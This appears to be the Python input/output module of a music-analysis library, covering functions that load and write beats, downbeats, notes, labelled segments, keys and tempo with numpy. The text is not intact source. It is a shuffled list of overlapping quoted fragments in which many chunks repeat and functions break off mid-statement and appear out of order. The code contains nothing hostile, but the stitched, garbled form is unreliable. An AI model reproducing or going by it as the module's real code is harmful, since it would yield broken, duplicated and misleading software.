Returns ------- tempo_1 : float", "= np.loadtxt(filename, ndmin=2) # 1st column is the event's time, the rest is", "algorithm # which keeps the order of the keys in case of duplicate", "'%.3f'), a sequence of formats (e.g. ['%.3f', '%d']), or a multi-format string (e.g.", "import suppress_warnings, string_types ENCODING = 'utf8' # dtype for numpy structured arrays that", "Parameters ---------- tempi : numpy array Array with the detected tempi (first column)", "or file handle File to load the beats from. downbeats : bool, optional", "are filtered to contain only the downbeats (i.e. only the times of those", "len(strengths): raise AssertionError('tempi and strengths must have same length') # order the tempi", "str Key name. filename : str or file handle Output file. header :", "notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled segments from", "Note: use 'mergesort', because we want a stable sorting algorithm # which keeps", "# no strength is given, assume an evenly distributed one if strength_sum ==", "write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled", "string (e.g. '%.3f %.3f'), in which case `delimiter` is ignored. delimiter : str,", "'%d']), or a multi-format string (e.g. '%.3f %d'), in which case `delimiter` is", "strengths ' 'separately.') strengths /= float(strength_sum) # tempi and strengths must have same", "float(strength_sum) # tempi and strengths must have same length if len(tempi) != len(strengths):", "numpy array Array with the detected tempi (first column) and their strengths (second", "header is not None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) # write events", "warnings warnings.warn('`max_len` is deprecated as of version 0.16 and will be ' 'removed", "file handle Output filename or handle. 
fmt : str or sequence of strs,", "try to load the data from file values = np.loadtxt(filename, ndmin=1) # split", "the beats to. fmt : str or sequence of strs, optional A single", "the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled segments", "@suppress_warnings def load_events(filename): \"\"\" Load a events from a text file, one floating", "header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information from the", "from the given file, one beat per line of format 'beat_time' ['beat_number']. Parameters", "and beats.ndim == 2: fmt = ['%.3f', '%d'] elif fmt is None: fmt", "from .audio import load_audio_file from .midi import load_midi, write_midi from ..utils import suppress_warnings,", "and 'label' the segment label. \"\"\" if fmt is None: fmt = ['%.3f',", "if not notes.ndim == 2: raise ValueError('unknown format for `notes`') # truncate format", "file as comment. mirex : bool, deprecated Report the lower tempo first (as", "format if fmt is None: fmt = ['%.3f', '%d', '%.3f', '%d'] if not", "file, one beat per line of format 'beat_time' ['beat_number']. Parameters ---------- filename :", "f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) # write events for e in events:", "= t2, t1, 1. - strength # format as a numpy array and", "fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a events from a text file, one", "are downbeats return values[values[:, 1] == 1][:, 0] else: # 1st column is", "1). \"\"\" if beats.ndim == 2: beats = beats[beats[:, 1] == 1][:, 0]", "fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load the notes from the given", "0] strength = tempi[0, 1] / sum(tempi[:2, 1]) # for MIREX, the lower", "with the given mode and closes it if needed afterwards. Parameters ---------- filename", "additional columns are ignored, i.e. 
only the first column is returned. \"\"\" #", "or a multi-format string (e.g. '%.3f %.3f'), in which case `delimiter` is ignored.", "fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords = write_segments def load_key(filename): \"\"\" Load", "events : numpy array Events to be written to file. filename : str", "event's time, the rest is ignored return events[:, 0] def write_events(events, filename, fmt='%.3f',", "file handle File to write the events to. fmt : str or sequence", "\"\"\" start, end, label = [], [], [] with open_file(filename) as f: for", "(column definition see SEGMENT_DTYPE). filename : str or file handle Output filename or", "tempo was detected if len(tempi) == 1: t1 = tempi[0][0] strength = 1.", "`split_value` are interpreted as tempi [bpm], `values` <= `split_value` are interpreted as strengths.", "position, and 'label' the segment label. \"\"\" if fmt is None: fmt =", "the beat time, the rest is ignored return values[:, 0] return values def", "file handle File to write the beats to. fmt : str or sequence", "- strength_sum) if np.any(strengths < 0): raise AssertionError('strengths must be positive') # no", "None: import warnings warnings.warn('`max_len` is deprecated as of version 0.16 and will be", "events: try: string = fmt % tuple(e.tolist()) except AttributeError: string = e except", "only one tempo was detected if len(tempi) == 1: t1 = tempi[0][0] strength", "['%.3f', '%d'] elif fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter,", "from. Returns ------- numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename,", "time, the rest is ignored return events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t',", "= ['%.3f', '%d', '%.3f', '%d'] if not notes.ndim == 2: raise ValueError('unknown format", "'wb') as f: # write header if header is not None: f.write(bytes(('# '", "or downbeats to be written to file. 
filename : str or file handle", "floating point numbers, and <label> is a string. Parameters ---------- filename : str", "read in the events, one per line events = np.loadtxt(filename, ndmin=2) # 1st", "if isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) # write output with open_file(filename, 'wb')", "File to write the beats to. fmt : str or sequence of strs,", "this is kind of hack-ish, find a better solution tempi = values[values >", "ndmin=2) # default values t1 = t2 = strength = np.nan # only", "array Events. Notes ----- Comments (lines starting with '#') and additional columns are", "three named columns: 'start' contains the start position (e.g. seconds), 'end' the end", "array with three named columns: 'start' contains the start position (e.g. seconds), 'end'", "---------- events : numpy array Events to be written to file. filename :", "built-in open() to transparently apply some magic file handling @contextlib.contextmanager def open_file(filename, mode='r'):", "write the notes to. fmt : str or sequence of strs, optional A", ": float, optional Value to distinguish between tempi and strengths. `values` > `split_value`", "be written at the beginning of the file as comment. 
\"\"\" events =", "label return segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments", "column is the beat time, the rest is ignored return values[:, 0] return", "warnings warnings.warn('`norm_strengths` is deprecated as of version 0.16 and ' 'will be removed", "transparently apply some magic file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager", "None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) # write events for e in", "want a stable sorting algorithm # which keeps the order of the keys", "np.nan # only one tempo was detected if len(tempi) == 1: t1 =", "= (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx] # return at most 'max_len'", "is deprecated as of version 0.16 and will be ' 'removed in 0.18.", "beat time, the rest is ignored return values[:, 0] return values def write_beats(beats,", "filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords = write_segments def load_key(filename): \"\"\"", "will be ' 'removed in 0.18. Please truncate the returned array ' 'separately.')", "name. \"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\"", "written to file. filename : str or file handle File to write the", "Value to distinguish between tempi and strengths. `values` > `split_value` are interpreted as", "normalize strengths ' 'separately.') strengths /= float(strength_sum) # tempi and strengths must have", "'%d', '%.3f', '%d'] if not notes.ndim == 2: raise ValueError('unknown format for `notes`')", "beats to a file. Parameters ---------- beats : numpy array Beats to be", "== 1: t1 = tempi[0][0] strength = 1. # consider only the two", "beats.ndim == 2: beats = beats[beats[:, 1] == 1][:, 0] if fmt is", "to load the downbeats from. 
Returns ------- numpy array Downbeats. \"\"\" return load_beats(filename,", "events = np.array(events) # reformat fmt to be a single string if needed", "handle File to load the notes from. Returns ------- numpy array Notes. \"\"\"", "filename : str or file handle File to write the notes to. fmt", "length 'num_tempi' is returned. If strengths are given, a 2D array with tempi", "case `delimiter` is ignored. delimiter : str, optional String or character separating columns.", "given file. Parameters ---------- filename : str or file handle File to read", "str or file handle File to write the events to. fmt : str", "tempi (first column) and their relative strengths (second column) is returned. \"\"\" #", "will be written at the beginning of the file as comment. \"\"\" if", "\"\"\" Load the downbeats from the given file. Parameters ---------- filename : str", "string, e.g. '%.3f %d %.3f %d', in which case `delimiter` is ignored. delimiter", "optional Value to distinguish between tempi and strengths. `values` > `split_value` are interpreted", "['velocity']]. filename : str or file handle File to write the notes to.", "# check if we need to open the file if isinstance(filename, string_types): f", "header=None): \"\"\" Write key string to a file. Parameters ---------- key : str", "order of the keys in case of duplicate keys # but we need", "beats to. fmt : str or sequence of strs, optional A single format", "'%.3f %.3f %s'), in which case `delimiter` is ignored. delimiter : str, optional", "'%.3f', '%d']), or a multi-format string, e.g. '%.3f %d %.3f %d', in which", "'onset_time' 'note_number' ['duration' ['velocity']]. filename : str or file handle File to write", "= end segments['label'] = label return segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None):", "dominant tempi and the relative strength to a file. Parameters ---------- tempi :", "Load the downbeats from the given file. 
Parameters ---------- filename : str or", "2d array tempi = np.array(tempi, ndmin=2) # default values t1 = t2 =", "case of duplicate keys # but we need to apply this '(-strengths)' trick", "of the file as comment. Returns ------- numpy array Notes. \"\"\" # set", "write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled segments from file,", "at the beginning of the file as comment. Returns ------- numpy array Notes.", "castable to str SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label', object)] # overwrite", "header=None, mirex=None): \"\"\" Write the most dominant tempi and the relative strength to", "------ Open file (handle). \"\"\" # check if we need to open the", "overwrite the built-in open() to transparently apply some magic file handling @contextlib.contextmanager def", "strs, optional A single format (e.g. '%.3f'), a sequence of formats, or a", "beginning of the file as comment. Notes ----- If `beats` contains both time", "is opened. Yields ------ Open file (handle). \"\"\" # check if we need", "\"\"\" Load labelled segments from file, one segment per line. Each segment is", "np.any(strengths < 0): raise AssertionError('strengths must be positive') # no strength is given,", "bool, deprecated Normalize the strengths to sum 1. max_len : int, deprecated Return", "File to load the beats from. downbeats : bool, optional Load only downbeats", "and their relative strength if max_len is not None: import warnings warnings.warn('`max_len` is", "tempi. If no strength is parsed, a 1-dimensional array of length 'num_tempi' is", "segments. \"\"\" start, end, label = [], [], [] with open_file(filename) as f:", "------- numpy array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim > 1:", "(list, tuple)): fmt = delimiter.join(fmt) # write output with open_file(filename, 'wb') as f:", "one beat per line of format 'beat_time' ['beat_number']. 
Parameters ---------- filename : str", ": str or file handle Output file. delimiter : str, optional String or", "beats.ndim == 2: fmt = ['%.3f', '%d'] elif fmt is None: fmt =", "write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments to a file. Parameters", "[bpm], `values` <= `split_value` are interpreted as strengths. sort : bool, deprecated Sort", "Load the notes from the given file, one note per line of format", "ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes to a", "as f: for line in f: s, e, l = line.split() start.append(float(s)) end.append(float(e))", "strengths are given (one less than tempi) if len(tempi) - len(strengths) == 1:", "be given first if mirex is not None: import warnings warnings.warn('`mirex` argument is", "read key information from. Returns ------- str Key. \"\"\" with open_file(filename) as f:", "' 'and will be removed in version 0.17. Please sort the ' 'tempi", "file handle File to read key information from. Returns ------- str Key. \"\"\"", "order the tempi according to their strengths if sort: import warnings warnings.warn('`sort` is", "sorting algorithm # which keeps the order of the keys in case of", "beats, they are filtered to contain only the downbeats (i.e. only the times", "for `notes`') # truncate format to the number of colums given fmt =", "str or file handle Output filename or handle. fmt : str or sequence", "tempi and strengths elif len(tempi) > 1: t1, t2 = tempi[:2, 0] strength", "= np.loadtxt(filename, ndmin=1) # split the filename according to their filename into tempi", "------- numpy array Notes. 
\"\"\" # set default format if fmt is None:", "open() to transparently apply some magic file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\"", "else: # 1st column is the beat time, the rest is ignored return", "float(len(tempi)) # normalize the strengths if norm_strengths is not None: import warnings warnings.warn('`norm_strengths`", "file handle File to load the notes from. Returns ------- numpy array Notes.", "tempi[sort_idx] strengths = strengths[sort_idx] # return at most 'max_len' tempi and their relative", "of the keys in case of duplicate keys # but we need to", "mode) else: f = filename fid = None # yield an open file", ": numpy array Beats to be written to file. filename : str or", "Parameters ---------- filename : str or file handle File to read the labelled", "tempi and strengths must have same length if len(tempi) != len(strengths): raise AssertionError('tempi", "# 'label' needs to be castable to str SEGMENT_DTYPE = [('start', np.float), ('end',", "MIREX). Returns ------- tempo_1 : float The most dominant tempo. tempo_2 : float", "%.3f %s'), in which case `delimiter` is ignored. delimiter : str, optional String", "< 0): raise AssertionError('strengths must be positive') # no strength is given, assume", "or file handle File to write the notes to. fmt : str or", "to a file, one event per line. Parameters ---------- events : numpy array", "numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None):", "'%.3f' write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load the downbeats from", "values[:, 0] return values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the", "delimiter.join(fmt) # write output with open_file(filename, 'wb') as f: # write header if", "floating point number per line. 
Parameters ---------- filename : str or file handle", "of version 0.16 and ' 'will be removed in 0.18. Please normalize strengths", "beginning of the file as comment. Returns ------- key : str Key name.", "deprecated as of version 0.16 and will be ' 'removed in 0.18. Please", "or file handle File to load the tempo from. split_value : float, optional", "apply some magic file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager which", "a file. Parameters ---------- key : str Key name. filename : str or", ": str, optional String that will be written at the beginning of the", "load the beats from. downbeats : bool, optional Load only downbeats instead of", "string. Parameters ---------- filename : str or file handle File to read the", "structured array Labelled segments, one per row (column definition see SEGMENT_DTYPE). filename :", "string (e.g. '%.3f %.3f %s'), in which case `delimiter` is ignored. delimiter :", "# write header if header is not None: f.write(bytes(('# ' + header +", "== 2: beats = beats[beats[:, 1] == 1][:, 0] if fmt is None:", "Load a events from a text file, one floating point number per line.", "def load_downbeats(filename): \"\"\" Load the downbeats from the given file. Parameters ---------- filename", "= delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename):", "notes from the given file, one note per line of format 'onset_time' 'note_number'", "fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats to a file. Parameters ---------- beats", "strengths /= float(strength_sum) # tempi and strengths must have same length if len(tempi)", "(first column) and their relative strengths (second column) is returned. 
\"\"\" # try", "filename : str or file handle File to read the labelled segments from.", "warnings.warn('`norm_strengths` is deprecated as of version 0.16 and ' 'will be removed in", "Notes. \"\"\" # set default format if fmt is None: fmt = ['%.3f',", "<start> and <end> are floating point numbers, and <label> is a string. Parameters", "make the strengths behave properly strength_sum = np.sum(strengths) # relative strengths are given", "at most 'max_len' tempi and their relative strength if max_len is not None:", "dominant tempo. tempo_2 : float The second most dominant tempo. strength : float", "to transparently apply some magic file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context", "File to write the notes to. fmt : str or sequence of strs,", "(second column). filename : str or file handle Output file. delimiter : str,", "returned. If strengths are given, a 2D array with tempi (first column) and", "the beats to a file. Parameters ---------- beats : numpy array Beats to", "or sequence of strs, optional A sequence of formats (e.g. ['%.3f', '%d', '%.3f',", "a single string if needed if isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) #", "or sequence of strs, optional A single format (e.g. '%.3f'), a sequence of", "'%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords = write_segments def", "are interpreted as strengths. sort : bool, deprecated Sort the tempi by their", "bool, optional Load only downbeats instead of beats. Returns ------- numpy array Beats.", ": str or file handle File (handle) to open. mode: {'r', 'w'} Specifies", "or file handle Output filename or handle. fmt : str or sequence of", "\"\"\" # set default format if fmt is None: fmt = ['%.3f', '%d',", "tempi[0][0] strength = 1. # consider only the two strongest tempi and strengths", "# format as a numpy array and write to output out = np.array([t1,", "single format (e.g. 
'%.3f'), a sequence of formats (e.g. ['%.3f', '%d']), or a", "split_value] # make the strengths behave properly strength_sum = np.sum(strengths) # relative strengths", "of hack-ish, find a better solution tempi = values[values > split_value] strengths =", "the beginning of the file as comment. Returns ------- numpy array Notes. \"\"\"", "= values[values > split_value] strengths = values[values <= split_value] # make the strengths", "handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager which yields an open file", "load the data from file values = np.loadtxt(filename, ndmin=1) # split the filename", "one note per line of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename:", "seconds), 'end' the end position, and 'label' the segment label. \"\"\" if fmt", "str Key. \"\"\" with open_file(filename) as f: return f.read().strip() def write_key(key, filename, header=None):", "fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events to a file, one event per", "relative strengths are given (one less than tempi) if len(tempi) - len(strengths) ==", "the beginning of the file as comment. \"\"\" events = np.array(events) # reformat", "/ sum(tempi[:2, 1]) # for MIREX, the lower tempo must be given first", "(e.g. '%.3f %.3f'), in which case `delimiter` is ignored. delimiter : str, optional", "are given (one less than tempi) if len(tempi) - len(strengths) == 1: strengths", "`max_len` tempi. Returns ------- tempi : numpy array, shape (num_tempi[, 2]) Array with", "needed afterwards. Parameters ---------- filename : str or file handle File (handle) to", "str or sequence of strs, optional A single format (e.g. '%.3f'), a sequence", "be removed in version 0.17. Please sort the ' 'tempi manually') if t1", "in events: try: string = fmt % tuple(e.tolist()) except AttributeError: string = e", "or a multi-format string (e.g. 
'%.3f %.3f %s'), in which case `delimiter` is", "downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats to a", "'label' the segment label. \"\"\" if fmt is None: fmt = ['%.3f', '%.3f',", "one per line events = np.loadtxt(filename, ndmin=2) # 1st column is the event's", "values = np.loadtxt(filename, ndmin=1) if values.ndim > 1: if downbeats: # rows with", "key from the given file. Parameters ---------- filename : str or file handle", "0.16 and will be ' 'removed in 0.18. Please sort the returned array", "to load the beats from. downbeats : bool, optional Load only downbeats instead", "Write the most dominant tempi and the relative strength to a file. Parameters", "elif fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) def", "for e in events: try: string = fmt % tuple(e.tolist()) except AttributeError: string", "per line. Each segment is of form <start> <end> <label>, where <start> and", "fmt = delimiter.join(fmt) # write output with open_file(filename, 'wb') as f: # write", "with uniformly distributed strengths to keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi =", "= fmt % tuple(e.tolist()) except AttributeError: string = e except TypeError: string =", "from the given file. Parameters ---------- filename : str or file handle File", "numpy array Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None):", "strength to a file. Parameters ---------- tempi : numpy array Array with the", "load the events from. Returns ------- numpy array Events. Notes ----- Comments (lines", "row (column definition see SEGMENT_DTYPE). 
filename : str or file handle Output filename", "---------- tempi : numpy array Array with the detected tempi (first column) and", "+ '\\n').encode(ENCODING))) # write events for e in events: try: string = fmt", "None: fmt = ['%.3f', '%d', '%.3f', '%d'] if not notes.ndim == 2: raise", "load_events(filename): \"\"\" Load a events from a text file, one floating point number", "= tempi[0, 1] / sum(tempi[:2, 1]) # for MIREX, the lower tempo must", "filename : str or file handle Output filename or handle. fmt : str", "only the downbeats (i.e. only the times of those beats with a beat", "(as required by MIREX). Returns ------- tempo_1 : float The most dominant tempo.", "return at most 'max_len' tempi and their relative strength if max_len is not", "set default format if fmt is None: fmt = ['%.3f', '%d', '%.3f', '%d']", "\"\"\" Load a events from a text file, one floating point number per", "load_onsets = load_events write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the", "return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes", "duplicate keys # but we need to apply this '(-strengths)' trick because we", "write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats to a file. Parameters", "def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the most dominant tempi and", "split_value : float, optional Value to distinguish between tempi and strengths. `values` >", "from __future__ import absolute_import, division, print_function import io as _io import contextlib import", "Structured array with columns 'start', 'end', and 'label', containing the beginning, end, and", "be written at the beginning of the file as comment. 
Returns ------- numpy", "isinstance(filename, string_types): f = fid = _io.open(filename, mode) else: f = filename fid", "fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information from", "in 0.18. Please normalize strengths ' 'separately.') strengths /= float(strength_sum) # tempi and", "numpy array, shape (num_tempi[, 2]) Array with tempi. If no strength is parsed,", "the downbeats to a file. Parameters ---------- beats : numpy array Beats or", "write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords = write_segments def load_key(filename):", "np.append(strengths, 1. - strength_sum) if np.any(strengths < 0): raise AssertionError('strengths must be positive')", "\"\"\" Input/output package. \"\"\" from __future__ import absolute_import, division, print_function import io as", "== 2: fmt = ['%.3f', '%d'] elif fmt is None: fmt = '%.3f'", "values[values <= split_value] # make the strengths behave properly strength_sum = np.sum(strengths) #", "strength is given, assume an evenly distributed one if strength_sum == 0: strengths", "labelled segments # 'label' needs to be castable to str SEGMENT_DTYPE = [('start',", "# order the tempi according to their strengths if sort: import warnings warnings.warn('`sort`", "times of those beats with a beat number of 1). \"\"\" if beats.ndim", "with a \"1\" in the 2nd column are downbeats return values[values[:, 1] ==", "t1 > t2: t1, t2, strength = t2, t1, 1. - strength #", "array Labelled segments Notes ----- Labelled segments are represented as numpy structured array", "columns. header : str, optional String that will be written at the beginning", "\"\"\" if fmt is None and beats.ndim == 2: fmt = ['%.3f', '%d']", "'#') and additional columns are ignored, i.e. 
only the first column is returned.", "> 1: t1, t2 = tempi[:2, 0] strength = tempi[0, 1] / sum(tempi[:2,", "2: raise ValueError('unknown format for `notes`') # truncate format to the number of", "t1 = t2 = strength = np.nan # only one tempo was detected", "np from .audio import load_audio_file from .midi import load_midi, write_midi from ..utils import", "lower tempo must be given first if mirex is not None: import warnings", "to be a single string if needed if isinstance(fmt, (list, tuple)): fmt =", "returned array ' 'separately.') # Note: use 'mergesort', because we want a stable", ": str or sequence of strs, optional A single format (e.g. '%.3f'), a", "their relative strengths (second column) is returned. \"\"\" # try to load the", "dtype for numpy structured arrays that contain labelled segments # 'label' needs to", "the beginning of the file as comment. Returns ------- numpy structured array Labelled", ": str or file handle File to write the beats to. fmt :", "sort : bool, deprecated Sort the tempi by their strength. norm_strengths : bool,", "elif len(tempi) > 1: t1, t2 = tempi[:2, 0] strength = tempi[0, 1]", "0: strengths = np.ones_like(tempi) / float(len(tempi)) # normalize the strengths if norm_strengths is", "2nd column are downbeats return values[values[:, 1] == 1][:, 0] else: # 1st", "behave properly strength_sum = np.sum(strengths) # relative strengths are given (one less than", ": bool, optional Load only downbeats instead of beats. Returns ------- numpy array", "the file if isinstance(filename, string_types): f = fid = _io.open(filename, mode) else: f", "file. Parameters ---------- beats : numpy array Beats or downbeats to be written", "= tempi[0][0] strength = 1. # consider only the two strongest tempi and", "handle Output file. 
header : str, optional String that will be written at", "Parameters ---------- filename: str or file handle File to load the notes from.", "2D array with tempi (first column) and their relative strengths (second column) is", "and strengths must have same length') # order the tempi according to their", "the relative strength to a file. Parameters ---------- tempi : numpy array Array", "written at the beginning of the file as comment. Notes ----- If `beats`", "----- Labelled segments are represented as numpy structured array with three named columns:", "Events to be written to file. filename : str or file handle File", "their relative strength if max_len is not None: import warnings warnings.warn('`max_len` is deprecated", "is given, assume an evenly distributed one if strength_sum == 0: strengths =", "str or sequence of strs, optional A sequence of formats (e.g. ['%.3f', '%.3f',", "the events to a file, one event per line. Parameters ---------- events :", "only the two strongest tempi and strengths elif len(tempi) > 1: t1, t2", "events from. Returns ------- numpy array Events. Notes ----- Comments (lines starting with", "split the filename according to their filename into tempi and strengths # TODO:", "their strengths (second column). filename : str or file handle Output file. 
delimiter", "open_file(filename, 'wb') as f: # write header if header is not None: f.write(bytes(('#", "according to their strengths if sort: import warnings warnings.warn('`sort` is deprecated as of", "np.loadtxt(filename, ndmin=2) # 1st column is the event's time, the rest is ignored", "in the events, one per line events = np.loadtxt(filename, ndmin=2) # 1st column", "' 'separately.') # Note: use 'mergesort', because we want a stable sorting algorithm", "header if header is not None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) #", "time and number of the beats, they are filtered to contain only the", "the two strongest tempi and strengths elif len(tempi) > 1: t1, t2 =", "file handle File to load the downbeats from. Returns ------- numpy array Downbeats.", "notes.ndim == 2: raise ValueError('unknown format for `notes`') # truncate format to the", ": str or file handle File to read the labelled segments from. Returns", "= strength = np.nan # only one tempo was detected if len(tempi) ==", "a 1-dimensional array of length 'num_tempi' is returned. If strengths are given, a", "write to output out = np.array([t1, t2, strength], ndmin=2) write_events(out, filename, fmt=['%.2f', '%.2f',", "the given mode and closes it if needed afterwards. Parameters ---------- filename :", "events = np.loadtxt(filename, ndmin=2) # 1st column is the event's time, the rest", "= fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets =", "Returns ------- numpy array Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None,", "are given, a 2D array with tempi (first column) and their relative strengths", "manually') if t1 > t2: t1, t2, strength = t2, t1, 1. -", "required by MIREX). Returns ------- tempo_1 : float The most dominant tempo. tempo_2", "------- key : str Key name. 
\"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename,", "from .midi import load_midi, write_midi from ..utils import suppress_warnings, string_types ENCODING = 'utf8'", "len(tempi) > 1: t1, t2 = tempi[:2, 0] strength = tempi[0, 1] /", "load the tempo from. split_value : float, optional Value to distinguish between tempi", "key : str Key name. \"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1.,", "handle File to read the labelled segments from. Returns ------- segments : numpy", ": str or file handle File to load the events from. Returns -------", "from. Returns ------- numpy array Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename,", "ignored, i.e. only the first column is returned. \"\"\" # read in the", "= np.append(strengths, 1. - strength_sum) if np.any(strengths < 0): raise AssertionError('strengths must be", "------- tempi : numpy array, shape (num_tempi[, 2]) Array with tempi. If no", "' 'removed in 0.18. Please truncate the returned array ' 'separately.') return np.vstack((tempi[:max_len],", "1: strengths = np.append(strengths, 1. - strength_sum) if np.any(strengths < 0): raise AssertionError('strengths", "Output file. header : str, optional String that will be written at the", "structured array Labelled segments Notes ----- Labelled segments are represented as numpy structured", "format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str or file handle File", "str or file handle File to load the downbeats from. Returns ------- numpy", "line of format 'beat_time' ['beat_number']. Parameters ---------- filename : str or file handle", "\"\"\" Write the notes to a file. Parameters ---------- notes : numpy array,", "file handle File to load the tempo from. split_value : float, optional Value", "of format 'beat_time' ['beat_number']. 
Parameters ---------- filename : str or file handle File", "not None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) # write events for e", "fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments to a file. Parameters ---------- segments", "= 1. # consider only the two strongest tempi and strengths elif len(tempi)", "the beginning of the file as comment. \"\"\" if fmt is None and", ": str or file handle Output file. header : str, optional String that", "with open_file(filename) as f: for line in f: s, e, l = line.split()", "# truncate format to the number of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) #", "removed in version 0.17. Please sort the ' 'tempi manually') if t1 >", "= np.sum(strengths) # relative strengths are given (one less than tempi) if len(tempi)", "to open the file if isinstance(filename, string_types): f = fid = _io.open(filename, mode)", "import load_midi, write_midi from ..utils import suppress_warnings, string_types ENCODING = 'utf8' # dtype", "tempo first (as required by MIREX). Returns ------- tempo_1 : float The most", "numpy structured array Labelled segments Notes ----- Labelled segments are represented as numpy", "according to their filename into tempi and strengths # TODO: this is kind", "# reformat fmt to be a single string if needed if isinstance(fmt, (list,", "as f: # write header if header is not None: f.write(bytes(('# ' +", "header=None): \"\"\" Write the notes to a file. Parameters ---------- notes : numpy", "a file. Parameters ---------- segments : numpy structured array Labelled segments, one per", "i.e. only the first column is returned. \"\"\" # read in the events,", "split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information from the given file. Tempo", "load_notes(filename): \"\"\" Load the notes from the given file, one note per line", "# yield an open file handle yield f # close the file if", "bool, deprecated Sort the tempi by their strength. 
norm_strengths : bool, deprecated Normalize", "= '%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load the", "write_segments def load_key(filename): \"\"\" Load the key from the given file. Parameters ----------", "the given tempi a 2d array tempi = np.array(tempi, ndmin=2) # default values", "write output with open_file(filename, 'wb') as f: # write header if header is", "Array with the detected tempi (first column) and their strengths (second column). filename", "be ' 'removed in 0.18. Please truncate the returned array ' 'separately.') return", "handle File to write the events to. fmt : str or sequence of", "beats = beats[beats[:, 1] == 1][:, 0] if fmt is None: fmt =", "given (one less than tempi) if len(tempi) - len(strengths) == 1: strengths =", "if norm_strengths is not None: import warnings warnings.warn('`norm_strengths` is deprecated as of version", "2: beats = beats[beats[:, 1] == 1][:, 0] if fmt is None: fmt", "the downbeats from. Returns ------- numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def", "at the beginning of the file as comment. \"\"\" if fmt is None", "delimiter='\\t', header=None): \"\"\" Write the notes to a file. Parameters ---------- notes :", "---------- segments : numpy structured array Labelled segments, one per row (column definition", "{'r', 'w'} Specifies the mode in which the file is opened. Yields ------", "'and will be removed in version 0.17. Please sort the ' 'tempi manually')", "the events to. fmt : str or sequence of strs, optional A single", "'separately.') # Note: use 'mergesort', because we want a stable sorting algorithm #", "beats from. downbeats : bool, optional Load only downbeats instead of beats. 
